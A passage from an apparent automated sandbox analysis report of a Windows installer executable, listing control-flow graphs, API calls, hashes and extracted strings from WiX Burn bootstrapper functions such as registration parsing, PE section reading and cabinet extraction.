90fdb8-90fdbd 378->383 379->378 385 90fd57-90fd6c CompareStringW 380->385 386 90fd4b-90fd55 380->386 384 90fd75-90fd7a 381->384 382->282 392 90fddc-90fdde 382->392 383->238 384->378 388 90fd7c-90fd94 call 903821 385->388 389 90fd6e 385->389 386->384 388->265 389->384 394 90fde0-90fde5 392->394 395 90fdea 392->395 394->238 395->282
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                    • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                                                                                                                                    • API String ID: 760788290-2956246334
                                                                                                                                                                    • Opcode ID: 9dd025abeb29be6a9239570262a2ab1d122f4df12d5fe06e27e7cc0f7435f922
                                                                                                                                                                    • Instruction ID: bf99724f3ab823fb675afebbffc5adcad058abdeb0eb0ffa7d27e3f38d7585c5
                                                                                                                                                                    • Opcode Fuzzy Hash: 9dd025abeb29be6a9239570262a2ab1d122f4df12d5fe06e27e7cc0f7435f922
                                                                                                                                                                    • Instruction Fuzzy Hash: 4EE1F632E4462ABECB31DAA0CC62FAEB6A86B81715F114671FE21F75D1D7609F0497C0
                                                                                                                                                                    Function 0090B48B Relevance: 91.6, APIs: 24, Strings: 28, Instructions: 578fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 396 90b48b-90b500 call 92f8e0 * 2 401 90b502-90b50c GetLastError 396->401 402 90b538-90b53e 396->402 403 90b519 401->403 404 90b50e-90b517 401->404 405 90b540 402->405 406 90b542-90b554 SetFilePointerEx 402->406 409 90b520-90b52d call 903821 403->409 410 90b51b 403->410 404->403 405->406 407 90b556-90b560 GetLastError 406->407 408 90b588-90b5a2 ReadFile 406->408 411 90b562-90b56b 407->411 412 90b56d 407->412 413 90b5a4-90b5ae GetLastError 408->413 414 90b5d9-90b5e0 408->414 427 90b532-90b533 409->427 410->409 411->412 418 90b574-90b586 call 903821 412->418 419 90b56f 412->419 420 90b5b0-90b5b9 413->420 421 90b5bb 413->421 416 90b5e6-90b5ef 414->416 417 90bbd7-90bbeb call 903821 414->417 416->417 423 90b5f5-90b605 SetFilePointerEx 416->423 435 90bbf0 417->435 418->427 419->418 420->421 425 90b5c2-90b5d4 call 903821 421->425 426 90b5bd 421->426 429 90b607-90b611 GetLastError 423->429 430 90b63c-90b654 ReadFile 423->430 425->427 426->425 433 90bbf1-90bbf7 call 940237 427->433 437 90b613-90b61c 429->437 438 90b61e 429->438 439 90b656-90b660 GetLastError 430->439 440 90b68b-90b692 430->440 449 90bbf8-90bc0a call 92e06f 433->449 435->433 437->438 445 90b620 438->445 446 90b625-90b632 call 903821 438->446 447 90b662-90b66b 439->447 448 90b66d 439->448 443 90b698-90b6a2 440->443 444 90bbbc-90bbd5 call 903821 440->444 443->444 450 90b6a8-90b6cb SetFilePointerEx 443->450 444->435 445->446 446->430 447->448 453 90b674-90b681 call 903821 448->453 454 90b66f 448->454 457 90b702-90b71a ReadFile 450->457 458 90b6cd-90b6d7 GetLastError 450->458 453->440 454->453 465 90b751-90b769 ReadFile 457->465 466 90b71c-90b726 GetLastError 457->466 463 90b6e4 458->463 464 90b6d9-90b6e2 458->464 471 90b6e6 463->471 472 90b6eb-90b6f8 call 903821 463->472 464->463 469 90b7a0-90b7bb SetFilePointerEx 465->469 470 90b76b-90b775 GetLastError 465->470 467 90b733 466->467 468 90b728-90b731 466->468 475 90b735 467->475 476 90b73a-90b747 call 903821 467->476 468->467 473 90b7f5-90b814 ReadFile 469->473 474 90b7bd-90b7c7 GetLastError 469->474 477 90b782 470->477 478 90b777-90b780 470->478 471->472 472->457 483 90b81a-90b81c 473->483 484 90bb7d-90bb87 GetLastError 473->484 480 90b7d4 474->480 481 90b7c9-90b7d2 474->481 475->476 476->465 485 90b784 477->485 486 90b789-90b796 call 903821 477->486 478->477 490 90b7d6 480->490 491 90b7db-90b7eb call 903821 480->491 481->480 493 90b81d-90b824 483->493 488 90bb94 484->488 489 90bb89-90bb92 484->489 485->486 486->469 495 90bb96 488->495 496 90bb9b-90bbb1 call 903821 488->496 489->488 490->491 491->473 498 90bb58-90bb75 call 903821 493->498 499 90b82a-90b836 493->499 495->496 515 90bbb2-90bbba call 940237 496->515 516 90bb7a-90bb7b 498->516 504 90b841-90b84a 499->504 505 90b838-90b83f 499->505 509 90b850-90b876 ReadFile 504->509 510 90bb1b-90bb32 call 903821 504->510 505->504 508 90b884-90b88b 505->508 512 90b8b4-90b8cb call 90394f 508->512 513 90b88d-90b8af call 903821 508->513 509->484 511 90b87c-90b882 509->511 522 90bb37-90bb3d call 940237 510->522 511->493 526 90b8cd-90b8ea call 903821 512->526 527 90b8ef-90b904 SetFilePointerEx 512->527 513->516 515->449 516->515 532 90bb43-90bb44 522->532 526->433 530 90b944-90b969 ReadFile 527->530 531 90b906-90b910 GetLastError 527->531 533 90b9a0-90b9ac 530->533 534 90b96b-90b975 GetLastError 530->534 536 90b912-90b91b 531->536 537 90b91d 531->537 538 90bb45-90bb47 532->538 541 90b9ae-90b9ca call 903821 533->541 542 90b9cf-90b9d3 533->542 539 90b982 534->539 540 90b977-90b980 534->540 536->537 543 90b924-90b934 call 903821 537->543 544 90b91f 537->544 538->449 549 90bb4d-90bb53 call 903a16 538->549 550 90b984 539->550 551 90b989-90b99e call 903821 539->551 540->539 541->522 547 90b9d5-90ba09 call 903821 call 940237 542->547 548 90ba0e-90ba21 call 944a05 542->548 558 90b939-90b93f call 940237 543->558 544->543 547->538 565 90ba23-90ba28 548->565 566 90ba2d-90ba37 548->566 549->449 550->551 551->558 558->532 565->558 569 90ba41-90ba49 566->569 570 90ba39-90ba3f 566->570 572 90ba55-90ba58 569->572 573 90ba4b-90ba53 569->573 571 90ba5a-90baba call 90394f 570->571 576 90babc-90bad8 call 903821 571->576 577 90bade-90baff call 92f360 call 90b208 571->577 572->571 573->571 576->577 577->538 584 90bb01-90bb11 call 903821 577->584 584->510
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0090B502
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B550
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0090B556
                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00904461,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B59E
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0090B5A4
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B601
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B607
                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B650
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B656
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B6C7
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B6CD
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B716
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B71C
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B765
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B76B
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B7B7
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B7BD
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B810
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B872
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B8FC
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B906
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                                                                                                                                    • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
                                                                                                                                                                    • API String ID: 3411815225-695169583
                                                                                                                                                                    • Opcode ID: e8c329dacb9a24d1a971b4b8a387a6a56078c7ac24ea6e297b20178186c9678e
                                                                                                                                                                    • Instruction ID: cc0866a8e3a3fac04f8436d531fc81e5fba43d4af927cf662544d080eb5f1988
                                                                                                                                                                    • Opcode Fuzzy Hash: e8c329dacb9a24d1a971b4b8a387a6a56078c7ac24ea6e297b20178186c9678e
                                                                                                                                                                    • Instruction Fuzzy Hash: D812E476A41235AFDB309B558C49FAB7AA8BF84B14F0141E5FE04BB2C1E7759D408BE0
                                                                                                                                                                    Function 00920D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 587 920d16-920d2d SetEvent 588 920d6f-920d7d WaitForSingleObject 587->588 589 920d2f-920d39 GetLastError 587->589 590 920db4-920dbf ResetEvent 588->590 591 920d7f-920d89 GetLastError 588->591 592 920d46 589->592 593 920d3b-920d44 589->593 596 920dc1-920dcb GetLastError 590->596 597 920df9-920dff 590->597 594 920d96 591->594 595 920d8b-920d94 591->595 598 920d48 592->598 599 920d4d-920d5d call 903821 592->599 593->592 602 920d98 594->602 603 920d9d-920db2 call 903821 594->603 595->594 604 920dd8 596->604 605 920dcd-920dd6 596->605 600 920e32-920e4b call 9021ac 597->600 601 920e01-920e04 597->601 598->599 619 920d62-920d6a call 940237 599->619 623 920e63-920e6e SetEvent 600->623 624 920e4d-920e5e call 940237 600->624 607 920e06-920e23 call 903821 601->607 608 920e28-920e2d 601->608 602->603 603->619 611 920dda 604->611 612 920ddf-920df4 call 903821 604->612 605->604 628 9210de-9210e4 call 940237 607->628 616 9210e8-9210ed 608->616 611->612 612->619 625 9210f2-9210f8 616->625 626 9210ef 616->626 619->616 630 920e70-920e7a GetLastError 623->630 631 920ea8-920eb6 WaitForSingleObject 623->631 643 9210e5-9210e7 624->643 626->625 628->643 632 920e87 630->632 633 920e7c-920e85 630->633 634 920ef0-920efb ResetEvent 631->634 635 920eb8-920ec2 GetLastError 631->635 638 920e89 632->638 639 920e8e-920ea3 call 903821 632->639 633->632 644 920f35-920f3c 634->644 645 920efd-920f07 GetLastError 634->645 640 920ec4-920ecd 635->640 641 920ecf 635->641 638->639 662 9210dd 639->662 640->641 651 920ed1 641->651 652 920ed6-920eeb call 903821 641->652 643->616 649 920fab-920fce CreateFileW 644->649 650 920f3e-920f41 644->650 646 920f14 645->646 647 920f09-920f12 645->647 653 920f16 646->653 654 920f1b-920f30 call 903821 646->654 647->646 656 920fd0-920fda GetLastError 649->656 657 92100b-92101f SetFilePointerEx 649->657 658 920f43-920f46 650->658 659 920f6e-920f72 call 90394f 650->659 651->652 652->662 653->654 654->662 663 920fe7 656->663 664 920fdc-920fe5 656->664 668 921021-92102b GetLastError 657->668 669 921059-921064 SetEndOfFile 657->669 665 920f67-920f69 658->665 666 920f48-920f4b 658->666 673 920f77-920f7c 659->673 662->628 677 920fe9 663->677 678 920fee-921001 call 903821 663->678 664->663 665->616 679 920f5d-920f62 666->679 680 920f4d-920f53 666->680 671 921038 668->671 672 92102d-921036 668->672 675 921066-921070 GetLastError 669->675 676 92109b-9210a8 SetFilePointerEx 669->676 683 92103a 671->683 684 92103f-921054 call 903821 671->684 672->671 681 920f7e-920f98 call 903821 673->681 682 920f9d-920fa6 673->682 685 921072-92107b 675->685 686 92107d 675->686 676->643 688 9210aa-9210b4 GetLastError 676->688 677->678 678->657 679->643 680->679 681->662 682->643 683->684 684->662 685->686 693 921084-921099 call 903821 686->693 694 92107f 686->694 689 9210c1 688->689 690 9210b6-9210bf 688->690 696 9210c3 689->696 697 9210c8-9210d8 call 903821 689->697 690->689 693->662 694->693 696->697 697->662
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,009208BC,?,?), ref: 00920D25
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,009208BC,?,?), ref: 00920D2F
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,009208BC,?,?), ref: 00920D74
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,009208BC,?,?), ref: 00920D7F
                                                                                                                                                                    • ResetEvent.KERNEL32(?,?,?,?,?,009208BC,?,?), ref: 00920DB7
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,009208BC,?,?), ref: 00920DC1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                                                                                                                                    • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                    • API String ID: 1865021742-2104912459
                                                                                                                                                                    • Opcode ID: cf05b86042d8c28f3cecfd6d4b66d41d67b64085328bc896f4ffdad069569125
                                                                                                                                                                    • Instruction ID: f403934f99d9dadabc6dc77f6f15fbe95e63a43e1b86bd1fa05e4565ec2b7c61
                                                                                                                                                                    • Opcode Fuzzy Hash: cf05b86042d8c28f3cecfd6d4b66d41d67b64085328bc896f4ffdad069569125
                                                                                                                                                                    • Instruction Fuzzy Hash: 8B91493BAC1632BBD33056AA6D09F6A3958BF91B21F124721BE10BF2C5D395DC1093D5
                                                                                                                                                                    Function 00904D39 Relevance: 38.7, APIs: 6, Strings: 16, Instructions: 220COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1124 904d39-904d81 call 92f8e0 call 9033c7 1129 904d83-904d90 call 940237 1124->1129 1130 904d95-904d9f call 9198f7 1124->1130 1135 904f31-904f3b 1129->1135 1136 904da1-904da6 1130->1136 1137 904da8-904db7 call 9198fd 1130->1137 1138 904f46-904f4a 1135->1138 1139 904f3d-904f42 CloseHandle 1135->1139 1140 904ddd-904df8 call 901f13 1136->1140 1144 904dbc-904dc0 1137->1144 1142 904f55-904f59 1138->1142 1143 904f4c-904f51 CloseHandle 1138->1143 1139->1138 1151 904e01-904e15 call 916a57 1140->1151 1152 904dfa-904dff 1140->1152 1147 904f64-904f66 1142->1147 1148 904f5b-904f60 CloseHandle 1142->1148 1143->1142 1149 904dc2 1144->1149 1150 904dd7-904dda 1144->1150 1154 904f68-904f69 CloseHandle 1147->1154 1155 904f6b-904f7f call 902782 * 2 1147->1155 1148->1147 1153 904dc7-904dd2 call 940237 1149->1153 1150->1140 1162 904e17 1151->1162 1163 904e2f-904e43 call 916b13 1151->1163 1152->1153 1153->1135 1154->1155 1168 904f81-904f84 call 945636 1155->1168 1169 904f89-904f8d 1155->1169 1166 904e1c 1162->1166 1176 904e45-904e4a 1163->1176 1177 904e4c-904e67 call 901f55 1163->1177 1170 904e21-904e2a call 940237 1166->1170 1168->1169 1173 904f97-904f9f 1169->1173 1174 904f8f-904f92 call 945636 1169->1174 1182 904f2e 1170->1182 1174->1173 1176->1166 1183 904e73-904e8c call 901f55 1177->1183 1184 904e69-904e6e 1177->1184 1182->1135 1187 904e98-904ec4 CreateProcessW 1183->1187 1188 904e8e-904e93 1183->1188 1184->1153 1189 904f01-904f17 call 940a28 1187->1189 1190 904ec6-904ed0 GetLastError 1187->1190 1188->1153 1194 904f1c-904f20 1189->1194 1191 904ed2-904edb 1190->1191 1192 904edd 1190->1192 1191->1192 1195 904ee4-904efc call 903821 1192->1195 1196 904edf 1192->1196 1194->1135 1197 904f22-904f29 call 940237 1194->1197 1195->1170 1196->1195 1197->1182
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 009033C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,009010DD,?,00000000), ref: 009033E8
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00904F40
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00904F4F
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00904F5E
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00904F69
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to append original command line., xrefs: 00904E69
                                                                                                                                                                    • burn.filehandle.attached, xrefs: 00904E17
                                                                                                                                                                    • Failed to append %ls, xrefs: 00904E1C
                                                                                                                                                                    • Failed to allocate full command-line., xrefs: 00904E8E
                                                                                                                                                                    • Failed to cache to clean room., xrefs: 00904DC2
                                                                                                                                                                    • -%ls="%ls", xrefs: 00904DE6
                                                                                                                                                                    • Failed to allocate parameters for unelevated process., xrefs: 00904DFA
                                                                                                                                                                    • %ls %ls, xrefs: 00904E55
                                                                                                                                                                    • "%ls" %ls, xrefs: 00904E7A
                                                                                                                                                                    • Failed to launch clean room process: %ls, xrefs: 00904EF7
                                                                                                                                                                    • Failed to wait for clean room process: %ls, xrefs: 00904F23
                                                                                                                                                                    • burn.clean.room, xrefs: 00904DDE
                                                                                                                                                                    • D, xrefs: 00904EA9
                                                                                                                                                                    • engine.cpp, xrefs: 00904EEA
                                                                                                                                                                    • Failed to get path for current process., xrefs: 00904D83
                                                                                                                                                                    • burn.filehandle.self, xrefs: 00904E45
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$FileModuleName
                                                                                                                                                                    • String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                                                                    • API String ID: 3884789274-2391192076
                                                                                                                                                                    • Opcode ID: a78667a18b3ce697d81e2b55f15b58131cdf770ac8172ae9349ff9b461984761
                                                                                                                                                                    • Instruction ID: 012971f7f406fba8fa28da457003380d062e5f8061cb035cbbe0fb0b09360522
                                                                                                                                                                    • Opcode Fuzzy Hash: a78667a18b3ce697d81e2b55f15b58131cdf770ac8172ae9349ff9b461984761
                                                                                                                                                                    • Instruction Fuzzy Hash: 75718FB2D4022AAFCF219BA4CC45EEEBB78AF44720F114255FB14B72D1D7749A418BE1
                                                                                                                                                                    Function 0091752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1201 91752a-91756f call 92f8e0 call 90762c 1206 917571-917576 1201->1206 1207 91757b-91758c call 90c407 1201->1207 1208 917814-91781b call 940237 1206->1208 1212 917598-9175a9 call 90c26e 1207->1212 1213 91758e-917593 1207->1213 1216 91781c-917821 1208->1216 1222 9175b5-9175ca call 90c4c8 1212->1222 1223 9175ab-9175b0 1212->1223 1213->1208 1218 917823-917824 call 945636 1216->1218 1219 917829-91782d 1216->1219 1218->1219 1220 917837-91783c 1219->1220 1221 91782f-917832 call 945636 1219->1221 1226 917844-917851 call 90c1bb 1220->1226 1227 91783e-91783f call 945636 1220->1227 1221->1220 1233 9175d6-9175e6 call 92c001 1222->1233 1234 9175cc-9175d1 1222->1234 1223->1208 1235 917853-917856 call 945636 1226->1235 1236 91785b-91785f 1226->1236 1227->1226 1242 9175f2-917665 call 915c33 1233->1242 1243 9175e8-9175ed 1233->1243 1234->1208 1235->1236 1240 917861-917864 call 945636 1236->1240 1241 917869-91786d 1236->1241 1240->1241 1245 917877-91787f 1241->1245 1246 91786f-917872 call 903a16 1241->1246 1250 917671-917676 1242->1250 1251 917667-91766c 1242->1251 1243->1208 1246->1245 1252 917678 1250->1252 1253 91767d-917698 call 905602 GetCurrentProcess call 940879 1250->1253 1251->1208 1252->1253 1257 91769d-9176b4 call 90827b 1253->1257 1260 9176b6 1257->1260 1261 9176ce-9176e5 call 90827b 1257->1261 1262 9176bb-9176c9 call 940237 1260->1262 1266 9176e7-9176ec 1261->1266 1267 9176ee-9176f3 1261->1267 1262->1216 1266->1262 1269 9176f5-917707 call 90821f 1267->1269 1270 91774f-917754 1267->1270 1280 917713-917723 call 903436 1269->1280 1281 917709-91770e 1269->1281 1271 917774-91777d 1270->1271 1272 917756-917768 call 90821f 1270->1272 1275 917789-91779d call 91a50c 1271->1275 1276 91777f-917782 1271->1276 1272->1271 1283 91776a-91776f 1272->1283 1288 9177a6 1275->1288 1289 91779f-9177a4 1275->1289 1276->1275 1279 917784-917787 1276->1279 1279->1275 1284 9177ac-9177af 1279->1284 1292 917725-91772a 1280->1292 1293 91772f-917743 call 90821f 1280->1293 1281->1208 1283->1208 1290 9177b1-9177b4 1284->1290 1291 9177b6-9177cc call 90d5a0 1284->1291 1288->1284 1289->1208 1290->1216 1290->1291 1297 9177d5-9177ed call 90cbc5 1291->1297 1298 9177ce-9177d3 1291->1298 1292->1208 1293->1270 1301 917745-91774a 1293->1301 1303 9177f6-91780d call 90c8e6 1297->1303 1304 9177ef-9177f4 1297->1304 1298->1208 1301->1208 1303->1216 1307 91780f 1303->1307 1304->1208 1307->1208
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to initialize internal cache functionality., xrefs: 0091779F
                                                                                                                                                                    • Failed to set source process folder variable., xrefs: 00917745
                                                                                                                                                                    • Failed to open manifest stream., xrefs: 009175AB
                                                                                                                                                                    • Failed to get manifest stream from container., xrefs: 009175CC
                                                                                                                                                                    • Failed to get unique temporary folder for bootstrapper application., xrefs: 009177CE
                                                                                                                                                                    • Failed to parse command line., xrefs: 00917667
                                                                                                                                                                    • Failed to set original source variable., xrefs: 0091776A
                                                                                                                                                                    • Failed to overwrite the %ls built-in variable., xrefs: 009176BB
                                                                                                                                                                    • WixBundleUILevel, xrefs: 009176D6, 009176E7
                                                                                                                                                                    • WixBundleSourceProcessPath, xrefs: 009176F8
                                                                                                                                                                    • Failed to initialize variables., xrefs: 00917571
                                                                                                                                                                    • Failed to open attached UX container., xrefs: 0091758E
                                                                                                                                                                    • Failed to get source process folder from path., xrefs: 00917725
                                                                                                                                                                    • Failed to extract bootstrapper application payloads., xrefs: 009177EF
                                                                                                                                                                    • Failed to set source process path variable., xrefs: 00917709
                                                                                                                                                                    • Failed to load manifest., xrefs: 009175E8
